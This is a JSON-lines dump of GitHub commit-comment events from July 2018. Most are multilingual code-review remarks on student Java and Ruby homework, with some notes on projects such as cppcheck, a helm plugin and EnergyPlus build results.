{"id":"7967232486","type":"CommitCommentEvent","actor":{"login":"mostafa-zaghloul"},"repo":{"name":"mostafa-zaghloul/image-classifier-deep-neural-network"},"payload":{"comment":{"id":29712546,"position":null,"line":null,"path":null,"commit_id":"008d3b3a8533cdbefac555b60c9ce869cddaa778","created_at":"2018-07-15T11:38:15Z","updated_at":"2018-07-15T11:38:15Z","author_association":"OWNER","body":"general functions to build multi Lyers NN."}},"created_at":"2018-07-15T11:38:15Z"}
{"id":"7967233092","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"FasterXML/jackson-databind"},"payload":{"comment":{"id":29712548,"position":97,"line":97,"path":"src/main/java/com/fasterxml/jackson/databind/util/ClassUtil.java","commit_id":"e4f23bb6779d434d88a7c4335f92d13ea639b373","created_at":"2018-07-15T11:38:47Z","updated_at":"2018-07-15T11:38:47Z","author_association":"NONE","body":"@cowtowncoder hey, where is this issue now?"}},"created_at":"2018-07-15T11:38:47Z"}
{"id":"7967233332","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712549,"position":79,"line":79,"path":"src/homework/functions/FirstTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:38:59Z","updated_at":"2018-07-15T11:38:59Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-15T11:38:59Z"}
{"id":"7967233605","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712550,"position":89,"line":89,"path":"src/homework/functions/FirstTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:39:12Z","updated_at":"2018-07-15T11:39:12Z","author_association":"NONE","body":"сразу можно return year % 4 == 0 && year % 100 != 0 || year % 400 == 0"}},"created_at":"2018-07-15T11:39:12Z"}
{"id":"7967233853","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712551,"position":118,"line":118,"path":"src/homework/functions/FirstTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:39:25Z","updated_at":"2018-07-15T11:39:25Z","author_association":"NONE","body":"switch должен иметь по код конвешену default контструкцию после всех case"}},"created_at":"2018-07-15T11:39:25Z"}
{"id":"7967234571","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29712554,"position":57,"line":57,"path":"chemie/chemie/templates/chemie/landing_page.html","commit_id":"748ec2c8d1b2935252d30ea73b2d7cb9729204b7","created_at":"2018-07-15T11:40:08Z","updated_at":"2018-07-15T11:40:08Z","author_association":"COLLABORATOR","body":"Ta bort bindestrek etter Kjemi (\"Kjemi-\")"}},"created_at":"2018-07-15T11:40:08Z"}
{"id":"7967234812","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712555,"position":120,"line":120,"path":"src/homework/functions/FirstTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:40:18Z","updated_at":"2018-07-15T11:40:18Z","author_association":"NONE","body":"стараться придерживаться того, чтобы из функции был только один return"}},"created_at":"2018-07-15T11:40:18Z"}
{"id":"7967235593","type":"CommitCommentEvent","actor":{"login":"danmar"},"repo":{"name":"danmar/cppcheck"},"payload":{"comment":{"id":29712559,"position":4,"line":148,"path":"lib/astutils.cpp","commit_id":"5d1fdf7958290d098998ba8afd7af391cc14d5a8","created_at":"2018-07-15T11:40:56Z","updated_at":"2018-07-15T11:40:56Z","author_association":"OWNER","body":"The `Token::simpleMatch(tok1->astParent(), \"=\")` is far from perfect.\r\n\r\nI assume no warning is written now for:\r\n\r\n    bool b;\r\n    b = !!b;\r\n\r\nand I envision that there are false positives for :\r\n\r\n    if (x == !!x)  // x and !!x are not the same unless x is bool"}},"created_at":"2018-07-15T11:40:56Z"}
{"id":"7967235930","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712563,"position":46,"line":46,"path":"src/homework/functions/ThirdTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:41:15Z","updated_at":"2018-07-15T11:41:15Z","author_association":"NONE","body":"сразу return value > 0"}},"created_at":"2018-07-15T11:41:15Z"}
{"id":"7967236158","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712564,"position":null,"line":null,"path":null,"commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:41:27Z","updated_at":"2018-07-15T11:41:27Z","author_association":"NONE","body":"по классу ГрузовойВагон тебе Влад оставлял замечания - они не исправлены"}},"created_at":"2018-07-15T11:41:27Z"}
{"id":"7967236444","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712565,"position":54,"line":54,"path":"src/homework/functions/ThirdTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:41:45Z","updated_at":"2018-07-15T11:41:45Z","author_association":"NONE","body":"не совсем корректно проверять double на 0, который является целочисленным и не хранит вещественной части"}},"created_at":"2018-07-15T11:41:45Z"}
{"id":"7967236543","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712566,"position":null,"line":null,"path":null,"commit_id":"3d9f8454ba627505f373db5b6f6ab1ae283a5187","created_at":"2018-07-15T11:41:50Z","updated_at":"2018-07-15T11:41:50Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1692 of 1692 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.02%25-green.png)</a>\n"}},"created_at":"2018-07-15T11:41:50Z"}
{"id":"7967236763","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29712567,"position":83,"line":83,"path":"chemie/chemie/templates/chemie/landing_page.html","commit_id":"748ec2c8d1b2935252d30ea73b2d7cb9729204b7","created_at":"2018-07-15T11:42:06Z","updated_at":"2018-07-15T11:42:06Z","author_association":"COLLABORATOR","body":"Ta bort \"-\". Se kommentar over"}},"created_at":"2018-07-15T11:42:06Z"}
{"id":"7967236851","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Katerina207/fp1a"},"payload":{"comment":{"id":29712568,"position":22,"line":22,"path":"src/homework/cycles/SecondTask.java","commit_id":"1b66ecdead9d3050b1bd1ff942275268e7e04d7b","created_at":"2018-07-15T11:42:10Z","updated_at":"2018-07-15T11:42:10Z","author_association":"NONE","body":"рекурсии на нашел :(\r\n"}},"created_at":"2018-07-15T11:42:10Z"}
{"id":"7967238168","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712570,"position":1,"line":1,"path":".vscode/launch.json","commit_id":"f164b1d63ad0c43acd15889f71eb5b44ff3d84f0","created_at":"2018-07-15T11:43:19Z","updated_at":"2018-07-15T11:43:19Z","author_association":"COLLABORATOR","body":".vscode folder should not be part of this repo. You can add a readme file section on how to debug/run using VS code."}},"created_at":"2018-07-15T11:43:19Z"}
{"id":"7967238233","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712571,"position":1,"line":1,"path":"lesson2/src/Homework1.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:43:23Z","updated_at":"2018-07-15T11:43:23Z","author_association":"NONE","body":"классы не могут быть не в пакете! а ты сразу в src поместил"}},"created_at":"2018-07-15T11:43:23Z"}
{"id":"7967238470","type":"CommitCommentEvent","actor":{"login":"tkrajina"},"repo":{"name":"raceresult/gpxgo"},"payload":{"comment":{"id":29712572,"position":6,"line":427,"path":"gpx/converters.go","commit_id":"dfd674473b91c9900b1a9ac54452e180292b7bf4","created_at":"2018-07-15T11:43:36Z","updated_at":"2018-07-15T11:43:36Z","author_association":"NONE","body":"Right, a stupid mistake on my side. Are you willing to make a pull request in gpxgo to with this fix? (If not, I'll just fix it myself)"}},"created_at":"2018-07-15T11:43:36Z"}
{"id":"7967238516","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712573,"position":20,"line":20,"path":"lesson2/src/Homework1.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:43:39Z","updated_at":"2018-07-15T11:43:39Z","author_association":"NONE","body":"сразу return (year % 400 == 0) || ((year % 4 == 0) && (year % 100 != 0))"}},"created_at":"2018-07-15T11:43:39Z"}
{"id":"7967238914","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712574,"position":32,"line":32,"path":"lesson2/src/Homework1.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:44:01Z","updated_at":"2018-07-15T11:44:01Z","author_association":"NONE","body":"названия функций с маленькой буквы"}},"created_at":"2018-07-15T11:44:01Z"}
{"id":"7967239189","type":"CommitCommentEvent","actor":{"login":"corneliusventi"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":29712576,"position":17,"line":17,"path":"imports/ui/App.js","commit_id":"3f57957fe2f5797f651f2892374a99e626d97d72","created_at":"2018-07-15T11:44:15Z","updated_at":"2018-07-15T11:44:15Z","author_association":"NONE","body":"this line is lacking return keyword before Task tag\r\n`return <Task key={task._id} task={task}/>`\r\n"}},"created_at":"2018-07-15T11:44:15Z"}
{"id":"7967239349","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712577,"position":27,"line":27,"path":"lesson2/src/Homework1.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:44:24Z","updated_at":"2018-07-15T11:44:24Z","author_association":"NONE","body":"даже если if содержит все одного строчку - все равно добавлять скобочки"}},"created_at":"2018-07-15T11:44:24Z"}
{"id":"7967239625","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712578,"position":46,"line":46,"path":"lesson2/src/Homework1.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:44:38Z","updated_at":"2018-07-15T11:44:38Z","author_association":"NONE","body":"default должно содержать конструкцию break"}},"created_at":"2018-07-15T11:44:38Z"}
{"id":"7967239629","type":"CommitCommentEvent","actor":{"login":"chbroecker"},"repo":{"name":"oconnor663/powerline-fontpatcher"},"payload":{"comment":{"id":29712579,"position":null,"line":null,"path":null,"commit_id":"d2c66ea7bfc5b445ed21f075e062cfb62ba26591","created_at":"2018-07-15T11:44:38Z","updated_at":"2018-07-15T11:44:38Z","author_association":"NONE","body":"Hey thank you this worked really well. \r\nAny idea why after patching it is working on the left but not on the last two powerline symbols in this example?\r\n![powerline_bug](https://user-images.githubusercontent.com/24273989/42733638-2f488cc2-8835-11e8-9648-12f30b09d123.png)\r\n"}},"created_at":"2018-07-15T11:44:38Z"}
{"id":"7967239842","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"vrozkovec/phpmyadmin"},"payload":{"comment":{"id":29712580,"position":null,"line":null,"path":null,"commit_id":"7ae5317cebea38895303062ac8b8d706b73bc20f","created_at":"2018-07-15T11:44:50Z","updated_at":"2018-07-15T11:44:50Z","author_association":"NONE","body":"<!-- PMABOT:SOB -->\nThis commit is missing Signed-Off-By line to indicate that you agree with phpMyAdmin Developer's Certificate of Origin. Please check [contributing documentation](https://github.com/phpmyadmin/phpmyadmin/blob/master/CONTRIBUTING.md) for more information."}},"created_at":"2018-07-15T11:44:50Z"}
{"id":"7967240325","type":"CommitCommentEvent","actor":{"login":"martaalfonso"},"repo":{"name":"martaalfonso/miniDash"},"payload":{"comment":{"id":29712586,"position":null,"line":null,"path":null,"commit_id":"6b4bab03e949fe78f542107e22f62d2e6329714a","created_at":"2018-07-15T11:45:16Z","updated_at":"2018-07-15T11:45:16Z","author_association":"OWNER","body":"Main program"}},"created_at":"2018-07-15T11:45:16Z"}
{"id":"7967240590","type":"CommitCommentEvent","actor":{"login":"sindreoy"},"repo":{"name":"HoiskolensChemikerforening/website"},"payload":{"comment":{"id":29712588,"position":135,"line":135,"path":"chemie/chemie/templates/chemie/landing_page.html","commit_id":"748ec2c8d1b2935252d30ea73b2d7cb9729204b7","created_at":"2018-07-15T11:45:29Z","updated_at":"2018-07-15T11:45:29Z","author_association":"COLLABORATOR","body":"Spesifisere hvor dette er? Tror ikke folk vet, og vet ikke om det viser på Gmaps"}},"created_at":"2018-07-15T11:45:29Z"}
{"id":"7967240633","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712589,"position":54,"line":54,"path":"lesson2/src/Homework1.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:45:31Z","updated_at":"2018-07-15T11:45:31Z","author_association":"NONE","body":"давать осмысленные названия переменным и функциям, чтобы было понятно, что там содержится"}},"created_at":"2018-07-15T11:45:31Z"}
{"id":"7967240930","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712591,"position":15,"line":24,"path":"lesson4/route.rb","commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:45:47Z","updated_at":"2018-07-15T11:45:47Z","author_association":"NONE","body":"в руби не принято использовать для индекса специально вводимые переменные\r\nдля этого есть встроенные методы языка\r\nпосмотри внимательно на [`each_with_index`](https://ruby-doc.org/core-2.5.1/Enumerable.html#method-i-each_with_index) и [`each.with_index(n)`](https://ruby-doc.org/core-2.5.1/Enumerator.html#method-i-with_index) и попробуй воспользоваться тем, который здесь больше подходит\r\n(про `each.with_index(n)` еще можно посмотреть [вот тут на СО](https://stackoverflow.com/questions/20258086/difference-between-each-with-index-and-each-with-index-in-ruby))"}},"created_at":"2018-07-15T11:45:47Z"}
{"id":"7967241192","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712593,"position":60,"line":60,"path":"lesson2/src/Homework1.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:46:00Z","updated_at":"2018-07-15T11:46:00Z","author_association":"NONE","body":"каждая конструкция с новой строки, а не все в одну month = 1; year++;"}},"created_at":"2018-07-15T11:46:00Z"}
{"id":"7967241496","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712595,"position":2,"line":4,"path":"json.csproj","commit_id":"9900519665a2265166965358312287e15ec282f8","created_at":"2018-07-15T11:46:14Z","updated_at":"2018-07-15T11:46:14Z","author_association":"COLLABORATOR","body":"lib folder should not be part of the repo as well"}},"created_at":"2018-07-15T11:46:14Z"}
{"id":"7967242038","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712597,"position":21,"line":21,"path":"lesson2/src/Homework2.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:46:43Z","updated_at":"2018-07-15T11:46:43Z","author_association":"NONE","body":"выносить в отдельную функцию, иначе невозможно разобраться "}},"created_at":"2018-07-15T11:46:43Z"}
{"id":"7967242307","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712599,"position":6,"line":6,"path":"lesson2/src/Homework2.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:46:59Z","updated_at":"2018-07-15T11:46:59Z","author_association":"NONE","body":"каждое присвоение переменной в новой строки!"}},"created_at":"2018-07-15T11:46:59Z"}
{"id":"7967242493","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712600,"position":3,"line":3,"path":"lesson2/src/Homework2.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:47:10Z","updated_at":"2018-07-15T11:47:10Z","author_association":"NONE","body":"\r\nделать отступ в одну строку между классом и функцией, а также между функциями"}},"created_at":"2018-07-15T11:47:10Z"}
{"id":"7967242677","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712602,"position":24,"line":24,"path":"lesson2/src/Homework2.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:47:20Z","updated_at":"2018-07-15T11:47:20Z","author_association":"NONE","body":"мне кажется, ты совсем не читал код конвеншен)"}},"created_at":"2018-07-15T11:47:20Z"}
{"id":"7967243214","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712604,"position":37,"line":37,"path":"lesson2/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:47:48Z","updated_at":"2018-07-15T11:47:48Z","author_association":"NONE","body":"\r\nкод не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-15T11:47:48Z"}
{"id":"7967243419","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712605,"position":36,"line":36,"path":"lesson2/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:48:00Z","updated_at":"2018-07-15T11:48:00Z","author_association":"NONE","body":"не нужно оставлять лишних пустых строк"}},"created_at":"2018-07-15T11:48:00Z"}
{"id":"7967243658","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"medeiva/ruby_basics"},"payload":{"comment":{"id":29712606,"position":null,"line":null,"path":null,"commit_id":"217232d9605a56a376c8ea0e6a340904fdc2a9be","created_at":"2018-07-15T11:48:12Z","updated_at":"2018-07-15T11:48:12Z","author_association":"NONE","body":"причем в Пассажирском вагоне этот вопрос решен )"}},"created_at":"2018-07-15T11:48:12Z"}
{"id":"7967243766","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712608,"position":24,"line":24,"path":"lesson2/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:48:19Z","updated_at":"2018-07-15T11:48:19Z","author_association":"NONE","body":"скобочки в if - else даже если одна конструкция"}},"created_at":"2018-07-15T11:48:19Z"}
{"id":"7967244369","type":"CommitCommentEvent","actor":{"login":"eliopinho"},"repo":{"name":"Shadowss/TravianZ"},"payload":{"comment":{"id":29712609,"position":null,"line":null,"path":null,"commit_id":"dc399437d0b6a35efcaeff0ef857089150a78393","created_at":"2018-07-15T11:48:54Z","updated_at":"2018-07-15T11:48:54Z","author_association":"NONE","body":"Good job!!!"}},"created_at":"2018-07-15T11:48:54Z"}
{"id":"7967244522","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712610,"position":28,"line":28,"path":"lesson2/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:49:03Z","updated_at":"2018-07-15T11:49:03Z","author_association":"NONE","body":"некорректно проверять double на 0, которыя является целочисленным и не умеет хранить вещественной части"}},"created_at":"2018-07-15T11:49:03Z"}
{"id":"7967244776","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712612,"position":24,"line":24,"path":"lesson2/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:49:15Z","updated_at":"2018-07-15T11:49:15Z","author_association":"NONE","body":"сразу return d > 0;"}},"created_at":"2018-07-15T11:49:15Z"}
{"id":"7967244971","type":"CommitCommentEvent","actor":{"login":"harhail666"},"repo":{"name":"OpenKore/openkore"},"payload":{"comment":{"id":29712613,"position":null,"line":null,"path":null,"commit_id":"1b8e86b864c8e038e1d7bab9c6c3e25c7ab5b719","created_at":"2018-07-15T11:49:26Z","updated_at":"2018-07-15T11:49:26Z","author_association":"NONE","body":"Thank you sir it worked. "}},"created_at":"2018-07-15T11:49:26Z"}
{"id":"7967245963","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712615,"position":19,"line":19,"path":"lesson3/src/Homework2.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:50:15Z","updated_at":"2018-07-15T11:50:15Z","author_association":"NONE","body":"давай нормальные названия не только переменным, но и параметрам функций"}},"created_at":"2018-07-15T11:50:15Z"}
{"id":"7967246549","type":"CommitCommentEvent","actor":{"login":"DanilMirov"},"repo":{"name":"DanilMirov/amsbot"},"payload":{"comment":{"id":29712616,"position":4,"line":146,"path":"ams.js","commit_id":"6ff5ed06bb9b0079eb299811794d81495399f7e8","created_at":"2018-07-15T11:50:41Z","updated_at":"2018-07-15T11:50:41Z","author_association":"OWNER","body":"Я просто похлопаю :clap:"}},"created_at":"2018-07-15T11:50:41Z"}
{"id":"7967247006","type":"CommitCommentEvent","actor":{"login":"RichardMeszaros"},"repo":{"name":"RichardMeszaros/Bomberman"},"payload":{"comment":{"id":29712618,"position":72,"line":72,"path":"Dyna Blaster/build.xml","commit_id":"ffc77e6cc19c25cf7e7764ec4f5103d742052f54","created_at":"2018-07-15T11:51:07Z","updated_at":"2018-07-15T11:51:07Z","author_association":"OWNER","body":"fczu\r\n"}},"created_at":"2018-07-15T11:51:07Z"}
{"id":"7967247062","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29712619,"position":15,"line":15,"path":"lesson3/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T11:51:10Z","updated_at":"2018-07-15T11:51:10Z","author_association":"NONE","body":"все равно откинется вещественная часть, надо хотя бы один операнд чтобы был вещественным значением"}},"created_at":"2018-07-15T11:51:10Z"}
{"id":"7967248083","type":"CommitCommentEvent","actor":{"login":"teleivo"},"repo":{"name":"Bahmni/person-management-app"},"payload":{"comment":{"id":29712622,"position":4,"line":6,"path":"package.json","commit_id":"a736fcd401cf6b5ead5b39a7c09d25831df5ff1f","created_at":"2018-07-15T11:52:06Z","updated_at":"2018-07-15T11:52:06Z","author_association":"COLLABORATOR","body":"did you do the `yarn add husky lint-staged prettier`?\r\n\r\nbecause these dependencies should end up in the yarn.lock file\r\n\r\nhttps://github.com/facebook/create-react-app/blob/master/packages/react-scripts/template/README.md#formatting-code-automatically"}},"created_at":"2018-07-15T11:52:06Z"}
{"id":"7967249097","type":"CommitCommentEvent","actor":{"login":"Phi-Van-Lam"},"repo":{"name":"xcoder123/MAX30100"},"payload":{"comment":{"id":29712626,"position":null,"line":null,"path":null,"commit_id":"ebd1859c31abc627067f681f8ddcad0cd3a5b93b","created_at":"2018-07-15T11:52:55Z","updated_at":"2018-07-15T11:52:55Z","author_association":"NONE","body":"Could you help me code by using raspberry pi c/c++?"}},"created_at":"2018-07-15T11:52:55Z"}
{"id":"7967250102","type":"CommitCommentEvent","actor":{"login":"cw881014"},"repo":{"name":"stormslowly/en.coder"},"payload":{"comment":{"id":29712627,"position":null,"line":null,"path":null,"commit_id":"fe376c625f86c3c95ca4207c1d4bb90eb3b28aad","created_at":"2018-07-15T11:53:46Z","updated_at":"2018-07-15T11:53:46Z","author_association":"NONE","body":"不错～～我今晚可剪"}},"created_at":"2018-07-15T11:53:46Z"}
{"id":"7967250437","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712628,"position":11,"line":3,"path":"Program.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T11:54:06Z","updated_at":"2018-07-15T11:54:06Z","author_association":"COLLABORATOR","body":"namespace should indicate it's a helm-related plugin.\r\nThe repo name helm-json-plugin does not indicate what it does, and not aligned with the plugin name convention.\r\nHave you followed the guidelines in https://github.com/kubernetes/helm/blob/master/docs/plugins.md?\r\nIf you look at the listed plugins, you would see that all plugin names == repo name, start with 'helm-' and without 'plugin' suffix. \r\nI recommend renaming the plugin to helm-json-output or something similar.  "}},"created_at":"2018-07-15T11:54:06Z"}
{"id":"7967251213","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712629,"position":12,"line":4,"path":"Program.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T11:54:42Z","updated_at":"2018-07-15T11:54:42Z","author_association":"COLLABORATOR","body":"What was the reason to develop a .net code helm plugin and not in Go?"}},"created_at":"2018-07-15T11:54:42Z"}
{"id":"7967252967","type":"CommitCommentEvent","actor":{"login":"zalewskigrzegorz"},"repo":{"name":"Isur/shop"},"payload":{"comment":{"id":29712632,"position":14,"line":18,"path":"server.js","commit_id":"077c2fda65622bf5596164bd217cf4992df70d8f","created_at":"2018-07-15T11:56:15Z","updated_at":"2018-07-15T11:56:15Z","author_association":"NONE","body":"Dobra praktyka jest wydzielenie api do osobnego endpointu aby nie bylo problemu z routingiem na stronie"}},"created_at":"2018-07-15T11:56:15Z"}
{"id":"7967253209","type":"CommitCommentEvent","actor":{"login":"erwanp"},"repo":{"name":"radis/radis"},"payload":{"comment":{"id":29712634,"position":null,"line":null,"path":null,"commit_id":"e819db79d12f84e8ca857cd9aa30d9d074d32513","created_at":"2018-07-15T11:56:27Z","updated_at":"2018-07-15T11:56:27Z","author_association":"MEMBER","body":"In my own test cases it was systematically faster by letting Joblib guess (`'auto'`). In the next commit i'll make it a user option. "}},"created_at":"2018-07-15T11:56:27Z"}
{"id":"7967253286","type":"CommitCommentEvent","actor":{"login":"yotsuba1022"},"repo":{"name":"ChengIrene/fujyosi-diary"},"payload":{"comment":{"id":29712635,"position":null,"line":null,"path":null,"commit_id":"9fb9247acbe7c1ec1f29eb55d6a28157627ed9e6","created_at":"2018-07-15T11:56:31Z","updated_at":"2018-07-15T11:56:31Z","author_association":"NONE","body":"💯"}},"created_at":"2018-07-15T11:56:31Z"}
{"id":"7967254019","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29712636,"position":null,"line":null,"path":null,"commit_id":"0f48509c7f1a13cfa4c2449becdc8b38c5abcbaa","created_at":"2018-07-15T11:57:12Z","updated_at":"2018-07-15T11:57:12Z","author_association":"OWNER","body":"Build version: __`2.2.0-master.69`__ :crossed_fingers: [`master`](https://github.com/streamich/nano-css/tree/master) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/69) :tada:"}},"created_at":"2018-07-15T11:57:12Z"}
{"id":"7967254491","type":"CommitCommentEvent","actor":{"login":"limorl"},"repo":{"name":"itye-msft/helm-json-plugin"},"payload":{"comment":{"id":29712637,"position":73,"line":71,"path":"Program.cs","commit_id":"82fa952010feb9c2e71dbf4ed1e21fe48453e0a8","created_at":"2018-07-15T11:57:35Z","updated_at":"2018-07-15T11:57:35Z","author_association":"COLLABORATOR","body":"be consistent with space. add space before and after >. Here and everywhere related.\r\n"}},"created_at":"2018-07-15T11:57:35Z"}
